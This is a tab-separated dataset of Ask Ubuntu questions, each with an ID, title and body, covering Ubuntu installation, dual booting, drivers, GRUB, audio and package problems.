508858	need help getting on windows and uninstalling ubuntu	im using a hp pavilion dm1 and i installed ubuntu using a usb stick because my laptop doesnt have a disk drive , i installed ubuntu on a new partition and chose to copy my files to it when installing . but when i looked through my documents i couldnt find any of my files . my firefox keeps freezing my laptop and its screwing me over . i cant get back onto windows 7 for some reason , ive tried many things . is there a way for me to uninstall ubuntu and get windows 7 back with all my files ? thanks !
508859	i want to try out an alternative de on 14.04 but am skeptical	unity is good and fine , and does it 's job ( my machine running ubuntu is simply my personal computer , no programming or anything being done ) but sometimes it leaves a little to be desired . i have tweaked unity about as much as i can since installing it but i 'm still interested in trying out differnt de 's like cinnamon and gnome . the issue is the last two times i tried installing gnome via ppa base on omgubuntu.com 's instructions , it broke unity and i had to fresh install ubuntu . granted that was on 13.10 . now i am becoming interested in trying cinnamon out , but do n't want to risk compromising my computer ... is it really as simple as this ? tl ; dr help me install cinnamon alongside my current unity without breaking system .
508862	is it possible to access and use all the files in the hard disk in both windows as well as ubuntu ?	is it possible to access and use all the files in the hard disk in both windows as well as ubuntu ? also ; what is a swap area ? where can i find someone who can help me with installation ?
508864	how do you limit root to no more than 1 login at a time ?	i took a practice test for a cert and one of the questions was `` limit root to no more 2 simultaneous logins , make this configuration persistent between restarts '' . i did n't even really know this was possible . is this just for ssh or could you do this for all terminal access on the machine ? if so , how ?
508869	usb wireless switched off by software somewhere	ubuntu 14.04 lts with a patriot wlan 11n micro usb adapter 1t1r pcusbw1150 will not enable on a fresh install on a sony vaio . the installed adapter hardware switch is broken in the off position . the task plane is showing both as disabled by hardware switch , the system settings , network window shows the software switch as off and will not stay on , rfkill shows both hard blocked and soft blocked as no . please help . here is the output from lshw -c network and rfkill . trip @ annesvaio : ~ $ sudo lshw -c network *-network disabled description : wireless interface product : pro/wireless 4965 ag or agn [ kedron ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan1 version : 61 serial : 00:13 : e8:17:60 : f1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl4965 driverversion=3.13.0-32-generic firmware=228.61.2.24 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:48 memory : fa000000-fa001fff *-network description : ethernet interface product : 88e8036 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth1 version : 16 serial : 00:13 : a9 : bf : cd:2c size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=10.0.0.2 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : fc200000-fc203fff ioport:5000 ( size=256 ) trip @ annesvaio : ~ $ sudo lshw -c network *-network disabled description : wireless interface product : pro/wireless 4965 ag or agn [ kedron ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan1 version : 61 serial : 00:13 : e8:17:60 : f1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl4965 driverversion=3.13.0-32-generic firmware=228.61.2.24 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:48 memory : fa000000-fa001fff *-network description : ethernet interface product : 88e8036 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth1 version : 16 serial : 00:13 : a9 : bf : cd:2c size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full ip=10.0.0.2 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:44 memory : fc200000-fc203fff ioport:5000 ( size=256 ) *-network disabled description : wireless interface physical id : 1 bus info : usb @ 2:1 logical name : wlan2 serial : 00:02:72 : c3:97 : b2 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.13.0-32-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn trip @ annesvaio : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 2 : phy2 : wireless lan soft blocked : no hard blocked : no trip @ annesvaio : ~ $ sudo rfkill unblock all [ sudo ] password for trip : trip @ annesvaio : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 2 : phy2 : wireless lan soft blocked : no hard blocked : no
508870	what is a `` swap area '' ?	so i noticed this question has not been asked directly ; what is this `` swap area '' people keep referring to when it comes to installing ubuntu ?
508874	should i delete all of my partitions while still running windows i want to do a complete install of just ubuntu	tell me if i 'm wrong on this as well delete all of my partitions will make my computer run faster while using just ubuntu
508878	i am unclear on this : are wubi installations actually supported on ubuntu 14.04 ?	i am unclear on this : are wubi installations supported on ubuntu 14.04 ? yes ; i know it is on the disk , but i find myself confused why it was put back on there , and questioning whether this was an accident or not . after it was taken off of 13.04 , i worked under the assumption that it reached end of life , and that people hence forth should be advised to not use it as a tool . is there any official explanation ?
508883	access freemind 1.0 from the laucher	there is a problem with freemind 0.9 , which is the version i get if i use sudo apt-get install freemind . when trying to share a .mm file between windows freemind and ubuntu freemind , i get the error error while parsing file : freemind.main.xmlparseexception : xml parse exception during parsing of a map element at line 1 : expected : = googling , i find advice at plabo : fixing `` error while parsing file : freemind.main.xmlparseexception : xml parse exception during parsing of a map element at line 1 : expected : = '' to instead use freemind 1.0 . i do n't do a lot of manual installs in linux . i first download , then unzip , and put the directory in /opt/ . i then add to ~/.profile the line export path= $ path : /opt/freemind-bin-max-1.0.0_rc_4/ . but this seems to only work for calling freemind.sh from the terminal . i 'd like to call from the launcher . is there a better way to do all this ? is there a relatively easy way that is also better ? i 've checked the freemind site , they only provide 0.9 for debian . note : i am kubuntu user .
508886	trying to remove apache2/httpd and installing mod_perl	it started with me trying to install apache and mod_perl by following this guide . however , foolishly i installed apache by using sudo apt-get install apache2 , which installed 2.4 on my system . after running perl makefile.pl < options > as per the instructions , i got the same error as this guy . it told me i should uninstall 2.4 and install 2.2 instead , which is what i tried to do by doing sudo apt-get remove -- purge apache2 . when i ran which apache2 it returned nothing so i assumed it was gone , but when i ran which httpd ( which gave a line ) and then httpd -v , it gave me : server version : apache/2.4.10 ( unix ) server built : aug 6 2014 20:38:13 server 's module magic number : 20120211:36 server loaded : apr 1.5.1-dev , apr-util 1.5.3 compiled using : apr 1.5.1-dev , apr-util 1.5.3 architecture : 32-bit server mpm : event threaded : yes ( fixed thread count ) forked : yes ( variable process count ) server compiled with ... . -d apr_has_sendfile -d apr_has_mmap -d apr_have_ipv6 ( ipv4-mapped addresses enabled ) -d apr_use_sysvsem_serialize -d apr_use_pthread_serialize -d single_listen_unserialized_accept -d apr_has_other_child -d ap_have_reliable_piped_logs -d dynamic_module_limit=256 -d httpd_root= '' '' -d suexec_bin= '' /bin/suexec '' -d default_pidlog= '' /logs/httpd.pid '' -d default_scoreboard= '' logs/apache_runtime_status '' -d default_errorlog= '' logs/error_log '' -d ap_types_config_file= '' /conf/mime.types '' -d server_config_file= '' /conf/httpd.conf '' so i tried to remove httpd with sudo apt-get remove httpd but one of the messages was virtual packages like 'httpd ' ca n't be removed . now i 'm really scared to install/remove anything else on my ubuntu system as i really have no idea what i 'm doing . how can i completely remove the apache/httpd/whatever 2.4 server and install only the 2.2 so it 'll let me install mod_perl ? i went here to follow their steps but after receiving the same error from trying to run the perl makefile as before i tried to see the httpd -v again and it told me i still had 2.4.10 . can someone run me through fully uninstalling everything i may have installed onto my ubuntu and then properly setting up a mod_perl/apache httpd 2.2 system so i can start playing with it ? edit : after deleting /usr/local/apache2 and running sudo apt-get install libapache2-mod-perl2 , here 's my results . $ which apache2 /usr/sbin/apache2 $ which httpd /bin/httpd $ apache2 -v server version : apache/2.4.7 ( ubuntu ) server built : jul 22 2014 14:36:39 $ httpd -v # same as previous in original text $ perl -mmod_perl2\ 999 mod_perl2 version 999 required -- this is only version 2.000008 . begin failed -- compilation aborted . does this mean i 've sucessfully done everything ? still worried about the httpd/apache thing
508898	can i write a file with only read permission ?	i just set a read only permission to a file using chmod 400 filename.txt after that i open the file via vi editor and edit and try to save using : w then is says e45 : 'readonly ' option is set ( add ! to override ) so i use : w ! . then it save the edited file with read only permission ? how can it be possible ? are there any differences between ubuntu and fedora that affect access permissions ?
508899	how do i get my shell script to automatically accept prompts ?	i made a simple shell script ( that i run as root ) to download essential apps that i might need whenever i reinstall ubuntu : it looks like this : apt-get install docky & & apt-get install geany & & apt-get install firefox & & apt-get install audacity & & apt-get install kdenlive & & apt-get install openshot & & apt-get install shotwell & & apt-get install stellarium & & apt-get install thunderbird , etc ... the problem is i still get prompted with y/n prompts and i manually need to press y all the time . is there a way i can automatically accept all the prompts and download and install everything ?
508900	grub rescue when usb stick not inserted	okay , i did something really sly , thinking i knew all the ins and outs . i got a great school laptop with windows 7 pro on it . did n't like it . so i installed ubuntu 14.04 lts 64 bit onto an 8gb flash drive ( sandisk ) . no problem . i wanted this to be clean cut and unnoticeable for when i return the laptop on january 1st when i graduate . having the usb drive in means i go to grub2 bootloader . not having it in ( trying to just boot into win 7 ) gives me a grub rescue . that 's pretty noticeable . i 'm not necessarily saying i want to `` delete/uninstall '' grub2 . i just want this laptop to boot normally if the usb drive is n't found . to just go straight to windows and boot from the internal drive . if i do need to end up uninstalling grub , can i have a simple , dumbed down answer ? i 'm pretty good with computers , but i chose ubuntu because it 's what my one friend calls `` easy '' linux . it 's more user friendly . so when it comes to grub , i 'm pretty lost . i tried doing this : https : //help.ubuntu.com/community/grubhowto/changedefaultos i get the following error in the terminal : '' cp : can not stat â/boot/grub/menu.lstâ : no such file or directory '' please help ! i love ubuntu , and that 's why i 'm using it for school and work purposes instead of win 7 . i just would like to return the school 's laptop without any `` damage '' done to it . i 've obviously never experienced this issue before because i 've never had to return any of my computers that i put ubuntu onto . help is greatly appreciated ! i know it 's a while until january but i did n't want to wait until the last minute for this .
508909	is amnesia available for free ?	how do we download or install the game amnesia ? do we have to buy it or is it free ? ( i 'm running ubuntu 12.04 . )
508914	how to install windows 8 in ubuntu 14.04 with dual boot option ?	i had a win 8 ( pre installed ) in my laptop i installed ubuntu . by mistake i installed it in my full hdd i would like to install win 8 again . i have my product key but do not have any installer/set up . i have again installed ubuntu for 30gb and rest of my disk is free . please advice
508916	installing wireless drivers on yoga 11s	yoga 11s wifi card drivers are not pre-installed . i have followed numerous instructions online all of which include downloading the same package , unzipping it , making it , sudo make install . a summary is here . every variation of this method i have used fails with the same two errors . two `` no such file or directory '' errors when i try to `` make '' the code . i have checked to make sure my kernels headers are installed , because someone said they are n't by default . i believe that person is wrong . @ chili555 requested lspci -nn , grep 0280 , lsb_release -d. they are in that order . lspci -nn : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:04.0 signal processing controller [ 1180 ] : intel corporation 3rd gen core processor thermal subsystem [ 8086:0153 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation qs77 express chipset lpc controller [ 8086:1e56 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 7 series/c210 series chipset family thermal management controller [ 8086:1e24 ] ( rev 04 ) grep 0280 removes the directory and my user name , but nothing else . i can type and hit enter but as far as i can tell it does nothing . lsb_release -d gives the output : description : ubuntu 14.04.01 lts lsusb gives the output : bus 002 device 005 : id 5986:053d acer , inc bus 002 device 004 : id 0bda:1724 realtek semiconductor corp . bus 002 device 003 : id 2047:0855 texas instruments bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 03eb:8814 atmel corp . bus 001 device 004 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 003 : id 058f:6387 alcor micro corp . flash drive bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub wireless is enabled in the bios , and it works in the windows 8 partition .
508917	how to extract archive or change permissions when there are `` read-only file system '' errors ?	i am using ubuntu 14.04 and having a problem changing the file permission of a .zip file . i can neither extract it nor change file permissions . when i extract it by command unzip ex_files_js_esst_2011.zip it shows me the following error : checkdir error : can not create ex_files_js_esst_2011 read-only file system unable to process ex_files_js_esst_2011 when i 'm execute the command sudo chmod 777 ex_files_js_esst_2011.zip it gives me the following error : chmod : changing permissions of âex_files_js_esst_2011.zipâ : read-only file system
508925	ubuntu 14.04 not recognizing gpu , extremely slow performance	i recently installed ubuntu 14,04 on my compaq presario cq62 laptop . specs : 4gb 1600 mhz ddr3 ram ati mobility radeon hd 4250 gpu amd v120 cpu , 1 core , 2200 mhz i have installed ubuntu using the `` demo mode '' from a bootable usb stick . everything worked in demo mode , my screen ran native res and everything responded very quickly . that 's why i decided to install ubuntu . this fresh install of ubuntu does not recognize my gpu , i calls it : vesa : rs880m . the screen resolution is set to 1024x768 and i can not change this resolution . everything responds extremely slowly , windows open and close with 2/3 frames per second , so does everything else . everything responds upto 20 seconds after i do anything . i have searched for hours for a solution to this problem , but i just can not find it . i suppose the problem is the gpu and it 's drivers , but i have yet to find a driver for my gpu / os combination . can anyone tell me why performance is so much better using demo mode , and why the fresh hard drive installation of ubuntu is much worse than the demo mode on a 1 dollar basic usb stick ? i have no idea how to fix this anymore ...
508928	display challenges after ubuntu 12.04 updates	first posting to this board and a newish linux user . i am running ubuntu version 12.04 lts via virtual box version 4.3.12 r93733 . it just went through a series of updates and after restarting my dash icons and a few other graphics are messed up . dash icons are appearing grey with lines through them ( basically unreadable ) and terminal window is whited out . any suggestions ? screenshot is here : thanks for any help .
508931	speaker sound not working in ubuntu 14.04 lts	this question is already asked , and i have tried all options since last 4 days , but no luck . so please allow me to ask this question once again . in my laptop ( os : ubuntu 14.04 lts ) , speaker sound not working . headphone is working though . below is the output of basic trouble-shoot - 1. sudo aplay -l **** list of playback hardware devices **** home directory not accessible : permission denied card 0 : pch [ hda intel pch ] , device 0 : cs4213 analog [ cs4213 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 2. find /lib/modules/uname -r | grep snd /lib/modules/3.13.0-32-generic/kernel/sound/firewire/snd-scs1x.ko /lib/modules/3.13.0-32-generic/kernel/sound/firewire/snd-firewire-lib.ko /lib/modules/3.13.0-32-generic/kernel/sound/firewire/snd-firewire-speakers.ko /lib/modules/3.13.0-32-generic/kernel/sound/firewire/snd-isight.ko /lib/modules/3.13.0-32-generic/kernel/sound/firewire/snd-dice.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/snd-rawmidi.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/seq/snd-seq-dummy.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/seq/snd-seq-midi-emul.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/seq/snd-seq-midi.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/seq/snd-seq-device.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/seq/snd-seq-midi-event.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/seq/snd-seq.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/seq/snd-seq-virmidi.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/snd-hwdep.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/snd-page-alloc.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/snd-hrtimer.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/snd-compress.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/snd-pcm.ko /lib/modules/3.13.0-32-generic/kernel/sound/core/snd-timer.ko -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 3. lspci -v | grep -a7 -i `` audio '' 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : dell device 0558 flags : bus master , fast devsel , latency 0 , irq 42 memory at f7d00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) after this i 've manually started the audio driver sudo modprobe snd_hda_intel then refreshed/reinstalled the driver : sudo aptitude -- purge reinstall linux-sound-base alsa-base alsa-utils linux-image-`uname -r` linux-ubuntu-modules-`uname -r` libasound2 below is the output of : gksudo gedit /etc/modules # /etc/modules : kernel modules to load at boot time . # # this file contains the names of kernel modules that should be loaded # at boot time , one per line . lines beginning with `` # '' are ignored . lp rtc lp rtc snd-hda-intel can anyne please help me ?
508933	how to install acr38 card reader	tried to install this driver : wiki.homebank.kz/attach/cardreadersetup/acr38_driver_lnx_1000_p.zip but did n't have success . i followed the same steps as in readme file , but faced problems when i was trying to do ./configure so i 've installed : libpcsclite-dev libusb-dev then when i did make i faced tons of errors . what the correct way of installing acr38 cardreader drivers in ubuntu ?
508934	how to install libpng and zlib	i 'm completely new to ubuntu . i got installed it because my school uses a lot of linux type stuff in my school 's computer science program so i figured i would use ubuntu on my own machine and just do my code from there instead of the computer labs . however , i 'm having a lot of trouble trying to install the numerous packages that are n't included natively on ubuntu . can someone help me install the png library , libpng and zlib . this is just one of many things i need to get on here but i think i need to first start off with this . i did download both packages , did the tar xf thingy on the download , and looked at the readme files for insight on installing the software . i get weird errors though . i first tried installing libpng and the terminal was like zlib is n't installed so i was like ok , i 'll just get zlib but permission is denied . do i need to get root or something ? i remember seeing people say root before , but i do n't know if it is relevant . i 'm really new so i do n't understand a lot of these things and it 's kinda scary . please help .
508935	ubuntu 14.04 ati hd 4670 driver not installed	i have been using 12.10 quite happily for some time but recently had to upgrade to 14.04 . ( note from comment : it 's a fresh install and have done it twice . ) my graphics card is the ati hd 4670 . when ubuntu boots up the graphics are super slow and i would guess that hardware acceleration is not being used ... .it seems as though the open source driver is not being installed . lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rv730 xt [ radeon hd 4670 ] [ 1002:9490 ] in fact it seems that not driver is installed at all : sudo lshw -c video *-display unclaimed description : vga compatible controller product : rv730 xt [ radeon hd 4670 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : d0000000-dfffffff memory : e5000000-e500ffff ioport : b000 ( size=256 ) memory : e4000000-e401ffff am i missing something obvious ? i have read this post but it does not have anyinformation on how to actually install the driver . i am not using this machine for games and just a reasonably responsive desktop would be ok .
508943	`` s '' not working	i was working in terminal and the character s no longer works . it 's not a keyboard issue as it works on all other applications , and shift-s works . also , even when i paste s it eliminates them from the string . i have no idea what 's happening .
508947	grub not loading after hibernate	i recently hibernated my system from ubuntu install media , and now grub does n't load . bios runs normally with the exception that most boot options are gone . when let boot normally a terminal write-head ( an underscore in this case ) appears , moves down a line , then hangs . the computer emits a beep when keys are pressed , and control-alt-delete restarts it . when booted back into install media the internal hdd is read as a fat32 partition labeled boot , a ext4 partition , and 15gb of swap space ( there should be 9 ) . gparted throws warnings when loading and also only displays the three partitions . when mounted it contains the root filesystem from my old ubuntu install . gpart yields the following output : begin scan ... end scan . checking partitions ... ok. guessed primary partition table : primary partition ( 1 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r primary partition ( 2 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r primary partition ( 3 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r primary partition ( 4 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r and parted gives the following output : ( parted ) print model : ata crucial_ct480m50 ( scsi ) disk /dev/sda : 937703088s sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 2048s 1050623s 1048576s fat32 boot 2 1050624s 921118719s 920068096s ext4 3 921118720s 937701375s 16582656s swsusp any ideas on what is wrong or could be done to fix it ?
508948	hybrid graphics . how to enable the second card	i should ubuntu 14.04 64bit . lenovo g505s tas worth two cards : [ radeon hd 8650g ] integrated graphics and [ radeon hd 8570a / 8570m ] i have not switched to the 8570m . help resolve this issue . just put sudo apt-get install fglrx fglrx-pxpress poprietarnye drivers are . but i determined only integrated graphics . 8570m does not want to run . how do i start it ? lshw lspci -v
508949	can i use boot-repair to wipe my computer ?	i 'm trying desperately to uninstall ubuntu 14.04 and replace it with windows 7 , but i 'm encountering serious issues . see this thread : trouble installing windows 7 via usb tl ; dr i have a windows 7 iso on a usb that wo n't boot . bios does n't recognize the usb . i have a second usb also with the iso , and it recognizes it , but wo n't boot . i tried to see if a ubuntu iso will work , but that also has no effect . i 'm taken to the grub screen , i select try ubuntu , there 's a black screen , and then back to the grub . no purple background either . i 'm wondering if i can use boot-repair to wipe this hdd , then plug the usb in and install windows . my concern is that i 'll be in the same situation , but without the ability to boot into my computer any longer . here 's what i have so far : my os in use is on /sda2 . i have an boot/efi partition on sda1 . boot-repair gives me the option to purge and reinstall the grub of /sda2 . these are the commands : sudo dpkg-configure-a sudo apt-get install -fy sudo apt-get purge-y-force-yes grub* shim-signed linux-signed* the instructions ask : do you want to have all grub 2 files removed from /boot/grub ? your system would then be unbootable if you do n't install another bootloader . remove grub 2 from /boot/grub ? to my noob-ish mind , this sounds like the right course of action , considering literally nothing else that i 've done has worked . i 've tried winusb , unetbootin , startup-disk-creator , when i encounter the black grub screen during boot , i changed the code to nomodetest and that did n't work , i changed the grubx64.efi to fallback.efi , etc . i 'm backed up to a wall here . any help would be great !
508956	sketchup 2014 ( using wine ) freezes on startup	i 'm trying to get sketchup 2014 to work on ubuntu 14.04 using wine 1.7 . when i start the application , i get the startup screen , which works fine , but after i selected the template and the main application starts , it just freezes . anyone else has this problem ?
508957	itunes music folders	i have managed to get into the itunes_control folder and find all the music files but what i want to do now is put music into it so my ipod will recognise the new music files and will be able to play them but i have no idea what all the random words or numbers mean , is anyone able to help ?
508958	nautilus-dropbox 0.7.1-2 installation process freeze	i tried to install flash player and drop box using software centre , but processes froze . then i found this topic . so i made this but the process stuck again . what should i do ? numemon @ numemon : ~ $ ubuntu-support-status support status summary of 'numemon ' : you have 1450 packages ( 100.0 % ) that can not/no-longer be downloaded you have 0 packages ( 0.0 % ) that are unsupported your current hardware enablement stack ( hwe ) is no longer supported since 2014-08-07 . security updates for critical parts ( kernel and graphics stack ) of your system are no longer available . for more information , please see : http : //wiki.ubuntu.com/1204_hwe_eol there is a graphics stack installed on this system . an upgrade to a supported ( or longer supported ) configuration will become available on 2014-07-16 and can be invoked by running 'update-manager ' in the dash . run with -- show-unsupported , -- show-supported or -- show-all to see more details numemon @ numemon : ~ $ numemon @ numemon : ~ $ cat /etc/dpkg/dpkg.cfg.d/multiarch cat : /etc/dpkg/dpkg.cfg.d/multiarch : no such file or directory numemon @ numemon : ~ $ numemon @ numemon : ~ $ dpkg -- print-foreign-architectures numemon @ numemon : ~ $ numemon @ numemon : ~ $ sudo grep -r proxy /etc/apt/* [ sudo ] password for numemon : numemon @ numemon : ~ $ sudo grep -r proxy /etc/apt/* numemon @ numemon : ~ $ grep proxy /etc/environment numemon @ numemon : ~ $ echo $ http_proxy numemon @ numemon : ~ $ echo $ ftp_proxy numemon @ numemon : ~ $ grep proxy /etc/bash.bashrc numemon @ numemon : ~ $ grep proxy ~/.bashrc numemon @ numemon : ~ $ cat /etc/apt/apt.conf cat : /etc/apt/apt.conf : no such file or directory numemon @ numemon : ~ $ sudo fuser -vvv /var/lib/dpkg/lock user pid access command /var/lib/dpkg/lock : root 10696 f ... . dpkg numemon @ numemon : ~ $ sudo fuser -vvv /var/cache/apt/archives/lock user pid access command /var/cache/apt/archives/lock : root 10687 f ... . apt-get numemon @ numemon : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.4 lts '' numemon @ numemon : ~ $ uname -a linux numemon 3.11.0-26-generic # 45~precise1-ubuntu smp tue jul 15 04:04:35 utc 2014 i686 i686 i386 gnu/linux numemon @ numemon : ~ $ sudo rm /var/lib/apt/lists/lock rm : can not remove `/var/lib/apt/lists/lock ' : no such file or directory numemon @ numemon : ~ $ sudo rm /var/cache/apt/archives/lock numemon @ numemon : ~ $ sudo rm /var/lib/dpkg/lock numemon @ numemon : ~ $ sudo cp -arf /var/lib/dpkg /var/lib/dpkg.backup numemon @ numemon : ~ $ sudo mv /var/lib/dpkg/status /var/lib/dpkg/status-bad numemon @ numemon : ~ $ sudo cp /var/lib/dpkg/status-old /var/lib/dpkg/status || sudo cp /var/backups/apt.extended_states.0 /var/lib/dpkg/status numemon @ numemon : ~ $ sudo mv /var/lib/dpkg/available /var/lib/dpkg/available-bad numemon @ numemon : ~ $ sudo cp /var/lib/dpkg/available-old /var/lib/dpkg/available numemon @ numemon : ~ $ sudo rm -rf /var/lib/dpkg/updates/* numemon @ numemon : ~ $ sudo rm -rf /var/lib/apt/lists numemon @ numemon : ~ $ sudo rm /var/cache/apt/*.bin numemon @ numemon : ~ $ sudo mkdir /var/lib/apt/lists numemon @ numemon : ~ $ sudo mkdir /var/lib/apt/lists/partial numemon @ numemon : ~ $ lang=c ; sudo apt-get clean numemon @ numemon : ~ $ lang=c ; sudo apt-get autoclean reading package lists ... done building dependency tree reading state information ... done numemon @ numemon : ~ $ lang=c ; sudo apt-get -- purge autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up libnss3-1d ( 3.15.4-0ubuntu0.12.04.2 ) ... setting up libnspr4-0d ( 4.9.5-0ubuntu0.12.04.3 ) ... setting up flashplugin-installer ( 11.2.202.394ubuntu0.12.04.1 ) ... setting up nautilus-dropbox ( 0.7.1-2 ) ... downloading dropbox ... 100 %
508960	listening to mic over speakers ( ubuntu 14.04 )	i have a little problem here . i was using an option in windows called listen to this device ( in audio tab in control panel ) and i was able to listen to microphone ( in my case that was a bassguitar ) and if i stopped playing the bassguitar i simply turned the volume down of the microphone - but the mic was functioning when i was talking on teamspeak , etc ... when i do turn down the volume of microphone on ubuntu it stops working entirely to the moment , when i get the volume back up . it is kind of annoying because when i am talking on teamspeak i have to hear myself through speakers -_- can anyone help me please how can i just turn down the volume so i will not hear what i am saying but the microphone will still work properly ? and when i plug in my bassguitar i will turn on my volume and i will hear the bassguitar ? i would really love , as i did in windows , to listen my bassguitar in high quality through the pc using ubuntu . thanks in advance !
508972	ubuntu 14 virtualized on vbox does n't see usb devices	i have the opposite problem of this how to set up usb for virtualbox ? it means that i 'm running ubuntu into virtualbox which is installed on windows 7 x64 . i tried plenty of time to search on google before posting the question , but the only tutorial i find are like the one i linked above can someone help me please ? thanks ... p.s . already read also this , but nothing virtualbox does n't recognize usb
